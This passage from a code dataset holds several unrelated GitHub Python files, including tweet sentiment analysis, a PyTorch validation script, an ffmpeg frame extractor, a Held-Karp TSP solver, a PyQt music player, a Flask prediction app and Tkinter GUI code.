uniqueName)\n\n","repo_name":"aliasger3008/GWL-time-series-analysis","sub_path":"Scraping/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33191131203","text":"# List of our semantic tags\nTAG_DEVICE = 'Device'\nTAG_INSTANCE = 'Instance'\nTAG_INSTANCE_TYPE = 'InstanceType'\nTAG_ARCHITECTURE = 'Architecture'\nTAG_ENA_SUPPORT = 'EnaSupport'\nTAG_AVAILABILITY_ZONE = 'AvailabilityZone'\nTAG_IAM_PROFILE_ARN = 'IamProfileArn'\nTAG_IAM_PROFILE_ID = 'IamProfileId'\nTAG_SECURITY_GROUPS = 'SecurityGroups'\n\n# Set of useful and common function\n\ndef get_name_from_tags(tags):\n '''\n Find the Value associated with the Tag Key \"Name\" (if it exists)\n :param tags: array of {Key:k, Value:v}\n :return: the Name Value or \"\"\n '''\n for tag in tags:\n if tag['Key'] == 'Name':\n return tag['Value']\n\n return \"\"\n\n","repo_name":"majeinfo/aws_disaster_recovery","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5940034905","text":"from tkinter import *\n\n\ndef button_clicked():\n my_label.config(text=input.get()) # get() is used to get the text from the entry\n\n# Window\nwindow = Tk()\nwindow.title(\"My first GUI program\")\nwindow.minsize(width=500, height=300)\nwindow.config(padx=20, pady=20) # padding\n \n# Label\nmy_label = Label(text=\"I am a label\", font=(\"Arial\", 24, \"italic\"))\nmy_label.grid(column= 0, row = 0) # pack() is used to show the label on the screen\n\n# Button\nnew_button = Button(text=\"Click Me\") # button is an object\nnew_button.grid(column = 2, row = 0) # pack() is used to show the button on the screen\n\nbutton = Button(text=\"Click Me\", command = button_clicked) # button is an object\nbutton.grid(column = 1, row = 1) # pack() is used to show the button on the screen\n\n\n# Entry\ninput = Entry(width=10)\ninput.grid(column = 3, row = 2) # pack() is used to show the entry on the screen\n \n\n\n\n\n\n\n\n\n\n\n\nwindow.mainloop()\n\n","repo_name":"michaelnyirenda/python-projects","sub_path":"mile to km converter/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9846407273","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose: Social Media Mining Project\r\n#\r\n# Author: Saurabh kumar\r\n# Format: PEP 8\r\n# Created: 12/09/2016\r\n# Copyright: (c) Saurabh kumar 2016\r\n# Licence: \r\n# Description: This code performs Sentiment Analysis on #Deflategate twitter data.\r\n#-------------------------------------------------------------------------------\r\n\r\n\r\n#Package Imports\r\nimport nltk\r\nimport re\r\nimport csv\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import PorterStemmer\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom random import shuffle\r\nfrom wordcloud import WordCloud\r\n\r\n\r\n#Initializing for short usage\r\nstopset = list(set(stopwords.words('english')))\r\nps = PorterStemmer()\r\nlemm = WordNetLemmatizer()\r\n\r\n\r\n#Function for basic preprocessing of the tweets\r\ndef preprocess(y):\r\n\r\n #The following code removes links, special characters etc.\r\n y 
= re.sub(r'http\\S+', ' ', y)\r\n y = re.sub(r'[^\\x00-\\x7f]', r' ', y)\r\n y = re.sub(r'[^a-zA-Z]+', r' ', y)\r\n y = re.sub(r'\\b\\w{1,2}\\b', r' ', y)\r\n\r\n return (y)\r\n\r\n\r\n#Function for advanced preprocessing of the tweets; Removing Stopwords, tokenizing and stemming\r\ndef advprocess(y):\r\n\r\n #tokenizing using word_tokenize function from nltk package\r\n y = nltk.word_tokenize(y)\r\n\r\n #The following code make use of list comprehension for compact view\r\n y = [word for word in y if word not in stopset]\r\n y = [lemm.lemmatize(word) for word in y]\r\n #y = [ps.stem(word) for word in y]\r\n\r\n #Returning a dictionary as it is a suitable datatype for Naive Bayes Classifier\r\n return dict([(word, True) for word in y])\r\n\r\n\r\n#Function to be used as a substitute for above advprocess()\r\n#Returns a dictionary to be used for Naive Bayes Classifier\r\ndef word_feats(words):\r\n\r\n return [word for word in words.split() if word not in stopset]\r\n\r\n\r\n#Function to classify sentiment for tweets in the test_set.\r\n#Uses Naive Bayes Classifier\r\ndef classify_naivebayes(train_set, test_set):\r\n\r\n #Training Naive Bayes\r\n classifier = nltk.NaiveBayesClassifier.train(train_set)\r\n\r\n #Classifying the test set\r\n output = [classifier.classify(text) for text in test_set]\r\n\r\n return output\r\n\r\n\r\n#Function to find the main context of data\r\ndef find_contexts(test_data):\r\n\r\n #Categorizing contexts in four groups based on specific conditions\r\n if \"organization\" in test_data.lower() or \"management\" in test_data.lower():\r\n return (\"Management\")\r\n\r\n elif \"tom\" in test_data.lower() or \"brady\" in test_data.lower():\r\n return (\"Tom Brady\")\r\n\r\n elif \"patriots\" in test_data.lower():\r\n return (\"Patriots\")\r\n\r\n else:\r\n return (\"Other\")\r\n\r\n\r\n#Function for finding insights in the tweets and comparison statistics\r\ndef analysis (contexts, sentiments):\r\n\r\n #initializing different type of sentiments - They store the value of number of tweets belonging to a specific category\r\n irrelevant_sentiments = 0\r\n positive_sentiments = 0\r\n negative_sentiments = 0\r\n neutral_sentiments = 0\r\n\r\n #initializing intermediate values\r\n mgt_positive = 0\r\n mgt_negative = 0\r\n tom_positive = 0\r\n tom_negative = 0\r\n pat_positive = 0\r\n pat_negative = 0\r\n\r\n #For calculating different values\r\n for i in range(len(contexts)):\r\n\r\n #Calculating the number of tweets in each sentiment category\r\n if sentiments[i] == 'positive':\r\n positive_sentiments+=1\r\n\r\n if contexts[i] == 'Management':\r\n mgt_positive += 1\r\n\r\n elif contexts[i] == 'Tom Brady':\r\n tom_positive += 1\r\n\r\n elif contexts[i] == 'Patriots':\r\n pat_positive += 1\r\n\r\n\r\n elif sentiments[i] == 'negative':\r\n negative_sentiments+=1\r\n\r\n if contexts[i] == 'Management':\r\n mgt_negative+=1\r\n\r\n elif contexts[i] == 'Tom Brady':\r\n tom_negative+=1\r\n\r\n elif contexts[i] == 'Patriots':\r\n pat_negative+=1\r\n\r\n elif sentiments[i] == 'neutral':\r\n neutral_sentiments+=1\r\n\r\n elif sentiments[i] == 'irrelevant':\r\n irrelevant_sentiments+=1\r\n\r\n else:\r\n print (\"Discrepancy\")\r\n\r\n #Creating a dictionary for different sentiment statistics\r\n sentiment_stat = {'irrelevant': irrelevant_sentiments, 'neutral': neutral_sentiments, 'positive': positive_sentiments, 'negative': negative_sentiments}\r\n\r\n #Creating a dictionary for different blame statistics\r\n blame_stat = {'Management': mgt_negative,'Tom Brady': 
tom_negative,'Patriots':pat_negative}\r\n\r\n #Creating a dictionary for different support statistics\r\n support_stat = {'Management': mgt_positive,'Tom Brady': tom_positive,'Patriots': pat_positive}\r\n\r\n #Stats to compare blame and support for Tom Brady\r\n tom_stat = {'Blame':tom_negative,'Support':tom_positive}\r\n\r\n # Stats to compare blame and support for Patriots\r\n pat_stat = {'Blame':pat_negative,'Support':pat_positive}\r\n\r\n #Calling graph function to plot histograms for various statistics\r\n graphs(sentiment_stat, blame_stat, support_stat, tom_stat, pat_stat)\r\n\r\n\r\n#Function to create graphs for the different findings\r\ndef graphs(sentiment_stat, blame_stat, support_stat, tom_stat, pat_stat):\r\n\r\n #Create Sentiment Statistics Histogram\r\n jet = plt.get_cmap('jet')\r\n plt.bar(range(len(sentiment_stat)), sentiment_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(sentiment_stat))))\r\n plt.xticks(range(len(sentiment_stat)), list(sentiment_stat.keys()))\r\n plt.xlabel('Sentiments')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Sentiment Statistics')\r\n plt.show()\r\n\r\n #Comparing blame and support statistics for Tom Brady\r\n plt.bar(range(len(tom_stat)), tom_stat.values(), align='center',color=jet(np.linspace(0, 1.0, len(tom_stat))))\r\n plt.xticks(range(len(tom_stat)), list(tom_stat.keys()))\r\n plt.xlabel('View')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Tom Brady Statistics')\r\n plt.show()\r\n\r\n #Comparing blame and support statistics for Patriots\r\n plt.bar(range(len(pat_stat)), pat_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(pat_stat))))\r\n plt.xticks(range(len(pat_stat)), list(pat_stat.keys()))\r\n plt.xlabel('View')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Patriots Statistics')\r\n plt.show()\r\n\r\n #Create Blame Statistics Histogram\r\n plt.bar(range(len(blame_stat)), blame_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(blame_stat))))\r\n plt.xticks(range(len(blame_stat)), list(blame_stat.keys()))\r\n plt.xlabel('Blamed')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Blame Statistics')\r\n plt.show()\r\n\r\n #Create Supportt Statistics Histogram\r\n plt.bar(range(len(support_stat)), support_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(support_stat))))\r\n plt.xticks(range(len(support_stat)), list(support_stat.keys()))\r\n plt.xlabel('Support')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Support Statistics')\r\n plt.show()\r\n\r\n\r\ndef word_cloud(text):\r\n\r\n #Removing stop words\r\n text = [word_feats(words) for words in text]\r\n\r\n #Generate a word cloud image\r\n wordcloud = WordCloud().generate(str(text))\r\n\r\n #Plot the wordcloud\r\n plt.imshow(wordcloud)\r\n plt.axis(\"off\")\r\n plt.show()\r\n\r\n\r\n#Primary function thats holds the logic for entire analysis\r\ndef context_sentiment_analysis():\r\n\r\n #Fetching the test data and train data\r\n data = pd.read_csv(\"input.csv\", encoding = 'latin1')\r\n train_data = pd.read_csv(\"corpus.csv\", encoding = 'latin1')\r\n\r\n\r\n #Preprocessing Test and Train data\r\n data.text = [preprocess(text) for text in data.text]\r\n train_data.TweetText = [preprocess(text) for text in train_data.TweetText]\r\n #data.text = [advprocess(text) for text in data.text]\r\n #train_data.TweetText = [advprocess(text) for text in train_data.TweetText]\r\n\r\n #Splitting Training data into Irrelevant, neutral, positive and negative tweets.\r\n #This helps in better processing and training Naive Bayes 
Classifier\r\n irrids = list(train_data.TweetText[:1689])\r\n negids = list(train_data.TweetText[1690:2261])\r\n netids = list(train_data.TweetText[2262:4595])\r\n posids = list(train_data.TweetText[4596:])\r\n\r\n #Applying advanced processing on the training tweets\r\n pos_feats = [(advprocess(f), 'positive') for f in posids]\r\n neg_feats = [(advprocess(f), 'negative') for f in negids]\r\n irr_feats = [(advprocess(f), 'irrelevant') for f in irrids]\r\n net_feats = [(advprocess(f), 'neutral') for f in netids]\r\n\r\n #Getting the complete list of tweets for training\r\n trainfeats = irr_feats + pos_feats + neg_feats + net_feats\r\n\r\n #Shuffling the different category of tweets to mix them up\r\n shuffle(trainfeats)\r\n\r\n #Preparing Test set\r\n test_set = list(advprocess(words) for words in data.text)\r\n\r\n #Finding Sentiments for the Test set\r\n output_sentiments = classify_naivebayes(trainfeats, test_set)\r\n\r\n #Finding Contexts for the Test set\r\n output_contexts = [find_contexts(data) for data in data.text]\r\n\r\n #Analysing the results of sentiment and context classification\r\n analysis(output_contexts, output_sentiments)\r\n\r\n #Getting the wordcloud out of the tweets\r\n word_cloud(data.text)\r\n\r\n #Writing Sentiments, contexts and tweets to the output file\r\n output = pd.DataFrame({\"Sentiments\": output_sentiments, \"Contexts\": output_contexts, \"Tweets\": data.text})\r\n output.to_csv(\"output_sentiments.csv\", index=False)\r\n\r\n #Alternate method of writing to the output file\r\n #with open('output_sentiments.csv', 'w') as myfile:\r\n # wr = csv.writer(myfile)\r\n # wr.writerow(list(output_sentiments))\r\n\r\n\r\n#Executes when the code is used as a script\r\nif __name__ == '__main__':\r\n\r\n #Calling the primary function for context and sentiment analysis\r\n context_sentiment_analysis()\r\n\r\n\r\n","repo_name":"saurabhkumar04/Deflategate-Analysis","sub_path":"socialmm.py","file_name":"socialmm.py","file_ext":"py","file_size_in_byte":10157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38378936085","text":"import torch\nfrom estcnn import *\nfrom AmblyopiaDatasetPaper import *\nfrom torch.utils.data.dataloader import DataLoader\nimport matplotlib.pyplot as plt\nimport os\n\ndata_length = [250,500,1000,1500,2000,2500,3000]\nratio = [0.5,1,2,3,4,5,6]\nepoch = 20\ndataset_path = r\"E:\\Dataset\\amplyopia\"\nmodel_path = r\"E:\\pythonProject\\EGG\\Paper\\amplyopia\\epoch\" + str(epoch) + \"\\ESTCNN_net_\"\n\nresult_dir = \"./epoch\" + str(epoch) + \"/result\"\nos.makedirs(result_dir,exist_ok=True)\nwith open(result_dir+\"/result.txt\",\"w\") as f:\n plt.title(\"Amblyopia Dataset in \"+str(epoch) + \" epochs\")\n plt.ylim([97, 100])\n plt.xlabel(\"ratio of sample rate\")\n plt.ylabel(\"accuracy\")\n\n for index, length in enumerate(data_length):\n model_name = model_path + str(length) + \".pth\"\n net = ESTCNN(16, length)\n dataset_path = r\"E:\\Dataset\\amplyopia\"\n dataset = AmblyopiaDataset(dataset_path, length)\n batch_size = 16\n correct = 0\n net.load_state_dict(torch.load(model_name))\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n net = net.to(device)\n dataloader = DataLoader(dataset=dataset, batch_size=batch_size)\n net.eval()\n with torch.no_grad():\n for x, y in dataloader:\n x = x.to(device).type(torch.cuda.FloatTensor)\n y = y.to(device)\n pred_y = torch.argmax(net(x), axis=1)\n correct += (pred_y == y).sum().item()\n\n accuracy = round(100 * correct / 
len(dataset), 2)\n print(accuracy)\n f.write(str(accuracy) + \"\\n\")\n\n plt.scatter(ratio[index], accuracy, c='b')\n\n plt.savefig(result_dir+\"/result.png\")\n plt.show()","repo_name":"Stanwang218/AmblyopiaResearch","sub_path":"AmblyopiaValidate.py","file_name":"AmblyopiaValidate.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25658913128","text":"# coding: utf-8\nimport os\nimport torch\nimport pandas as pd\nimport numpy as np\n\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor, Lambda\n\nimport matplotlib.pyplot as plt\nfrom torchvision.io import read_image\nfrom torch.utils.data import DataLoader\n\"\"\"\n @Time : 2021/4/29 17:37\n @Author : houjingru@semptian.com\n @FileName: 4_Dataloaders.py\n @Software: PyCharm\n\"\"\"\n\n\n\"\"\"\n 一:加载数据集\n\"\"\"\ntraining_data = datasets.FashionMNIST(\n root=\"data\",\n train=True,\n download=True,\n transform=ToTensor()\n)\n\ntest_data = datasets.FashionMNIST(\n root=\"data\",\n train=False,\n download=True,\n transform=ToTensor()\n)\n\"\"\"\n 二:迭代和可视化数据\n\"\"\"\nlabels_map = {\n 0: \"T-Shirt:T恤\",\n 1: \"Trouser:长裤\",\n 2: \"Pullover:套衫\",\n 3: \"Dress:着装\",\n 4: \"Coat:外套\",\n 5: \"Sandal:凉鞋\",\n 6: \"Shirt:衬衫\",\n 7: \"Sneaker:运动鞋\",\n 8: \"Bag:包\",\n 9: \"Ankle Boot:踝靴\",\n}\n\n\"\"\"\n 三:创建自定义数据集\n\"\"\"\n\n\nclass CustomImageDataset(Dataset):\n \"\"\"\n 创建自定义数据集\n \"\"\"\n def __init__(self, annotations_file, img_dir, transform=None, target_transform=None):\n self.img_labels = pd.read_csv(annotations_file)\n self.img_dir = img_dir\n self.transform = transform\n self.target_transform = target_transform\n\n def __len__(self):\n return len(self.img_labels)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.img_dir, self.img_labels.iloc[idx, 0])\n image = read_image(img_path)\n label = self.img_labels.iloc[idx, 1]\n if self.transform:\n image = self.transform(image)\n if self.target_transform:\n label = self.target_transform(label)\n\n sample = {\"image\": image, \"label\": label}\n return sample\n\n\n\"\"\"\n 四:准备数据,使用DataLoader进行模型训练\n\"\"\"\ntrain_dataloader = DataLoader(training_data, batch_size=64, shuffle=True)\ntest_dataloader = DataLoader(test_data, batch_size=64, shuffle=True)\n\n\n\"\"\"\n 五:使用DataLoader遍历数据\n\"\"\"\ntrain_features, train_labels = next(iter(train_dataloader))\nprint(f\"Feature batch shape: {train_features.size()}\")\nprint(f\"Labels batch shape: {train_labels.size()}\")\n\nimg = train_features[0].squeeze()\nlabel = train_labels[0]\n\nplt.imshow(img, cmap=\"gray\")\nplt.show()\nprint(f\"Label: {label}\")\n","repo_name":"jingruhou/hjrPyTorch","sub_path":"1_base/4_Dataloaders.py","file_name":"4_Dataloaders.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70334846553","text":"import os\nfrom torch.utils.data import DataLoader, Dataset\nimport time\nimport glob\n\n\nclass MyDataset(Dataset):\n def __init__(self):\n self.IN = 'video-high/'\n self.OUT = 'faces/'\n\n self.files = glob.glob(os.path.join(self.IN, 's*', '*.mpg'))\n\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, idx):\n file = self.files[idx] # video-high/s1/bbcnzze.mpg\n _, ext = os.path.splitext(file)\n dst = file.replace(self.IN, self.OUT).replace(ext, '')\n\n if not os.path.exists(dst):\n os.makedirs(dst)\n\n cmd = 'ffmpeg -i {} -qscale:v 2 -r 
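The validation loop in the amblyopia record above can be factored into a reusable helper. This sketch assumes any classifier-style torch module and a DataLoader yielding (inputs, integer labels); the names are illustrative, not from the original repository:

import torch

def evaluate_accuracy(net, dataloader, device):
    net.eval()
    correct, total = 0, 0
    with torch.no_grad():
        for x, y in dataloader:
            x, y = x.to(device).float(), y.to(device)
            pred = torch.argmax(net(x), dim=1)  # dim=1 is the class axis
            correct += (pred == y).sum().item()
            total += y.size(0)
    return round(100.0 * correct / total, 2)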
25 {}/%d.jpg'.format(file, dst)\n os.system(cmd)\n return dst\n\n\nif __name__ == '__main__':\n dataset = MyDataset()\n loader = DataLoader(dataset, num_workers=32, batch_size=128, shuffle=False, drop_last=False)\n tic = time.time()\n for (i, batch) in enumerate(loader):\n eta = (1.0 * time.time() - tic) / (i + 1) * (len(loader) - i)\n print('eta:{}'.format(eta / 3600.0))\n","repo_name":"LindgeW/DoLipReading","sub_path":"Processing/extract_frame.py","file_name":"extract_frame.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"7084912546","text":"import itertools\r\nimport time\r\n\r\n\r\ndef solve_tsp(matrix: list):\r\n MATRIX_SIZE = len(matrix)\r\n VERTICES = list(range(1, MATRIX_SIZE)) # lista wierzcholkow z pomienieciem zerowego\r\n PRE = {} # obiekt przechowujacy informacje o poprzedzajacych wierzcholkach (do odtwarzania sciezki)\r\n COST = {} # { (xi, S): V } -- gdzie V to koszt przejscia z wierzcholka xi do 0-wego przechodzac przez wszystkie wierzcholki w zbiorze S dokladnie raz\r\n\r\n start_time = time.time_ns()\r\n\r\n # wczytanie pojedynczych kosztow przejscia (z kazdego wierzcholka do 0-wego)\r\n for k in VERTICES:\r\n COST[(k, (k,))] = matrix[0][k]\r\n\r\n # obliczenie pozostalych kosztow przejsc\r\n for k in range(2, MATRIX_SIZE):\r\n # print(f'[{k}/{MATRIX_SIZE-1}] ', end='\\r')\r\n # wszystkie kombinacje zbiorow wierzcholkow o danej dlugosci k -- [(1, 2, 3), (1, 2, 4), (1, 3, 4), (2, 3, 4), ...]\r\n subsets = itertools.combinations(VERTICES, k)\r\n\r\n # dla kazdego zbioru ze zbiorow kombinacji\r\n for set in subsets:\r\n # dla kazdego wierzcholka w zbiorze\r\n for xi in set:\r\n new_set = tuple(x for x in set if x != xi) # utworzenie nowego zbioru bez obecnie sprawdzanego wierzcholka\r\n\r\n min_cost = float('inf') # najmniejszy koszt przejcia\r\n min_pre = None # wierzcholek i sciezka poprzedzajace najmniejszy koszt przejscia\r\n\r\n # dla kazdego wierzcholka w nowym zbiorze\r\n for xj in new_set:\r\n cost = COST[(xj, new_set)] + matrix[xj][xi] # dodanie kosztu przejscia\r\n\r\n # jezeli koszt przejscia jest mniejszy niz obecnie zapisany to zapisz poprzedzajacy wierzcholek\r\n if cost < min_cost:\r\n min_cost = cost\r\n min_pre = (xj, new_set)\r\n\r\n COST[(xi, set)] = min_cost # zapisanie kosztu przejscia z wierzcholka 'xi' do 0-wego przez wszystkie punktu ze zbioru 'set'\r\n PRE[(xi, set)] = min_pre # zapisanie informacji o poprzedzajacym wierzcholku 'xj' i sciezce 'S\\{xi}'\r\n\r\n del new_set\r\n del set\r\n \r\n solution, path = backtrack(matrix, COST, PRE, VERTICES)\r\n\r\n stop_time = time.time_ns()\r\n work_time = round((stop_time - start_time) * 10**(-9), 2)\r\n\r\n return {\r\n 'time': work_time,\r\n 'solution': solution,\r\n 'path': tuple(path)\r\n }\r\n\r\n\r\ndef backtrack(matrix: list, COST: dict, PRE: dict, VERTICES: list):\r\n cost_keys = list(COST.keys())\r\n max_cost_keys = cost_keys[-len(VERTICES):] # lista najdluzszych zestawow\r\n\r\n solution = float('inf')\r\n pre = None\r\n\r\n # znalezienie rozwiazania z najwiekszych zbiorow wraz z poprzedzajacym je wierzcholkiem\r\n for key in max_cost_keys:\r\n cost = COST[key] + matrix[key[0]][0]\r\n if cost < solution:\r\n solution = cost\r\n pre = key\r\n\r\n path = [0, pre[0]]\r\n\r\n # backtracking po zapisanych poprzedzajacych wierzcholkach\r\n cost_keys.reverse()\r\n current_set = pre\r\n while len(current_set[1]) != 1:\r\n path.append(PRE[current_set][0])\r\n current_set = PRE[current_set]\r\n 
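For the frame-extraction record above, a hedged alternative to os.system: subprocess with list arguments avoids shell-quoting problems in file paths. Like the original, this assumes ffmpeg is on PATH; the function name is an editorial choice:

import subprocess

def extract_frames(src, dst, fps=25):
    # Same ffmpeg invocation as the record, without going through a shell.
    cmd = ['ffmpeg', '-i', src, '-qscale:v', '2', '-r', str(fps), f'{dst}/%d.jpg']
    subprocess.run(cmd, check=True)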
path.append(0)\r\n\r\n return solution, path\r\n","repo_name":"macie-kk/PEA","sub_path":"2. DP - Held Karp/src/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15770785264","text":"from datetime import datetime\nimport unittest\n\nfrom ddt import ddt, data\n\nfrom timebook import payperiodtypes\n\n\n@ddt\nclass TestPayPeriodCalculations(unittest.TestCase):\n @data(\n (\n datetime(2013, 5, 1),\n datetime(2013, 4, 1),\n datetime(2013, 5, 2),\n ),\n (\n datetime(2013, 4, 28),\n datetime(2013, 3, 29),\n datetime(2013, 4, 29),\n ),\n )\n def test_rolling_30_day_window_calculations(self, value):\n date, begin_period, end_period = value\n instance = payperiodtypes.Rolling30DayWindow(date)\n self.assertEquals(\n instance.begin_period,\n begin_period\n )\n self.assertEquals(\n instance.end_period,\n end_period\n )\n\n @data(\n (\n datetime(2013, 5, 1),\n datetime(2013, 4, 20),\n datetime(2013, 5, 25),\n ),\n (\n datetime(2013, 4, 18),\n datetime(2013, 3, 23),\n datetime(2013, 4, 20),\n ),\n )\n def test_monthly_on_second_to_last_friday_calculations(self, value):\n date, begin_period, end_period = value\n instance = payperiodtypes.MonthlyOnSecondToLastFriday(date)\n self.assertEquals(\n instance.begin_period,\n begin_period\n )\n self.assertEquals(\n instance.end_period,\n end_period\n )\n","repo_name":"coddingtonbear/timebook","sub_path":"tests/test_payperiodtypes.py","file_name":"test_payperiodtypes.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"5"} +{"seq_id":"3741686304","text":"from PyQt5.QtCore import QUrl \nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtMultimedia import QMediaPlayer\nfrom PyQt5.QtMultimedia import QMediaPlaylist\nfrom PyQt5.QtMultimedia import QMediaContent\nimport os\n\n# need to modify in buddingMainWindow.py:\n#self.voiceButton = buddingMusic.BuddingVoice(self.tailWidget, self.controller)\n\nclass BuddingVoice(QtWidgets.QPushButton):\n def __init__(self, parent, controller):\n super(BuddingVoice, self).__init__(parent)\n # music button config.\n self.controller = controller\n self.controller.register_observer(\"music_button\", self)\n self.clicked.connect(self.voice_clicked)\n self.musicon = 1\n\n #playlist, set according to level\n self.playlist = QMediaPlaylist()\n self.url = None\n self.level = self.controller.get_level()\n print(\"user level\", self.level)\n #below is for test\n #self.level = 3\n self.url = self.choose_music(self.level)\n self.playlist.addMedia(QMediaContent(self.url))\n self.playlist.setPlaybackMode(QMediaPlaylist.Loop)\n \n #player\n self.player = QMediaPlayer()\n self.player.setPlaylist(self.playlist)\n self.player.play()\n\n def voice_clicked(self):\n if self.musicon:\n self.player.pause()\n else:\n #below is for test on_level_update\n #self.on_level_update()\n self.player.play()\n self.musicon = 1 - self.musicon\n\n def on_level_update(self, newlevel):\n #below is for test\n #newlevel = self.level + 1\n print(\"newlevel\", newlevel, \"oldlevel\", self.level)\n self.player.pause()\n self.playlist.removeMedia(0)\n self.url = self.choose_music(newlevel)\n self.playlist.addMedia(QMediaContent(self.url))\n self.player.setPlaylist(self.playlist)\n self.player.play()\n self.level = newlevel\n\n def music_path(self, music):\n fp = \"./music/\" + music\n return os.path.abspath(fp)\n\n def choose_music(self, level):\n mystr = \"\"\n if 
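A quick way to sanity-check the Held-Karp solver in the record above is to compare it against exhaustive enumeration on small matrices, since both must agree on the optimal tour cost. This checker is an editorial addition, not part of the original repository:

from itertools import permutations

def brute_force_tsp(matrix):
    # Optimal tour cost found by trying every ordering of vertices 1..n-1.
    n = len(matrix)
    best = float('inf')
    for perm in permutations(range(1, n)):
        tour = (0,) + perm + (0,)
        best = min(best, sum(matrix[a][b] for a, b in zip(tour, tour[1:])))
    return best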
level == 1:\n mystr = self.music_path(\"sad.mp3\")\n elif level == 2:\n mystr = self.music_path(\"neutral.mp3\")\n else:\n mystr = self.music_path(\"happy.mp3\")\n return QUrl.fromLocalFile(mystr)\n\n def on_logout(self):\n self.musicon = 0\n self.player.stop()","repo_name":"hreatx/TYTS","sub_path":"buddingMusic.py","file_name":"buddingMusic.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"12733804948","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom flask import Flask, request, render_template\nimport joblib\n\n\n# In[2]:\n\n\napp = Flask(__name__)\n\n\n# In[3]:\n\n\n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef i():\n if request.method == \"POST\":\n inc = float(request.form.get(\"income\"))\n print(inc)\n aged = float(request.form.get(\"age\"))\n print(aged)\n loa = float(request.form.get(\"loan\"))\n print(aged)\n xgb_model = joblib.load(\"CRE\")\n xgb_pred = xgb_model.predict([[inc,aged,loa]])\n\n return(render_template(\"index.html\", result3 = xgb_pred))\n else:\n return render_template(\"index.html\", result =\"GET METHOD\")\n\n\n# In[ ]:\n\n\nif __name__==\"__main__\":\n app.run()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Winnwu/CreditCardDefault","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16347209216","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport tkinter as tk # 使用Tkinter前需要先导入\nfrom PIL import Image, ImageTk\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\n\nfrom functions.log4py import print_log\nfrom gui.ui.globel_varable import set_value\nfrom gui.ui.globel_varable import get_value\nfrom gui.ui.month_transaction import create_grandet_bills_window_by_month\nfrom gui.ui.detail_page import show_detail_page\n\nfrom functions.read_table import ReadTransactionTable\nfrom functions.log4py import print_log\n\nfrom modules.transaction_extract import ExtractTransactions\n\nfrom modules.transaction import YearsTransaction\nfrom modules.transaction import MonthsTransaction\nfrom modules.transactions_tools import TransactionsTools\n\n\ndef fill_bill_files(bill_frame: tk.Frame, file_names: list) -> tk.Frame:\n \n # 左侧账单文件列表\n # bill_frame = tk.Frame(root)\n # bill_frame = tk.Frame(root, width=20) # 设置列表框架宽度为窗口宽度的1/4\n # bill_frame.pack(side=\"left\", fill=\"both\", expand=True)\n bill_frame.pack(side=\"left\", fill=\"y\", expand=True)\n\n bill_header = tk.Label(bill_frame, text=\"📁 账单文件列表\")\n bill_header.pack(side=\"top\")\n \n bill_list = tk.Listbox(bill_frame)\n for index, file_name in enumerate(file_names):\n bill_list.insert(index, \"📃:\" + file_name)\n \n bill_list.pack(side=\"top\", fill=\"both\", expand=True)\n \n log_label = tk.Label(bill_frame, text=\"📔 日志\")\n log_label.pack(side=\"top\")\n\n log_text = tk.Text(bill_frame, height=10)\n log_text.pack(side=\"bottom\", fill=\"both\", expand=True)\n \n return bill_frame\n\n\ndef fill_bill_information(yearly_summary: tk.Frame, root: tk.Tk, head_words: list, months: list, year: int) -> tk.Frame:\n \n # 右侧每年花销简介\n # yearly_summary = tk.Frame(root)\n yearly_summary.pack(side=\"right\", fill=\"both\", expand=True)\n\n header = tk.Frame(yearly_summary)\n header.pack(side=\"top\", fill=\"x\")\n\n year_header = tk.Label(header, 
